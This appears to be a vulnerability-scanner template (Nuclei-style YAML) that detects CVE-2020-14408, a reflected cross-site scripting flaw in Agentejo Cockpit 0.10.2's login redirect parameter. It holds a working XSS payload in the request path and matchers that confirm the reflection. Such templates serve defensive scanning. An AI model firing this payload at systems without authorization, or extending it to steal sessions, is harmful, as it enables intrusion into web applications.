48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: CVE-2020-14408
|
|
|
|
info:
|
|
name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
|
|
remediation: |
|
|
Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/agentejo/cockpit/issues/1310
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-14408
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00113
|
|
epss-percentile: 0.44537
|
|
cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: agentejo
|
|
product: cockpit
|
|
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "redirectTo = '/92874';alert(document.domain)//280';"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a8b1bd3540ba280673014fb39de1330f3413362c5d60e02dc68b9d78d2f1798b022100f343d64379872fdeb2b085fb61dd32963f36ade55420610befe37e2c72c8f837:922c64590222798bb761d5b6d8e72950 |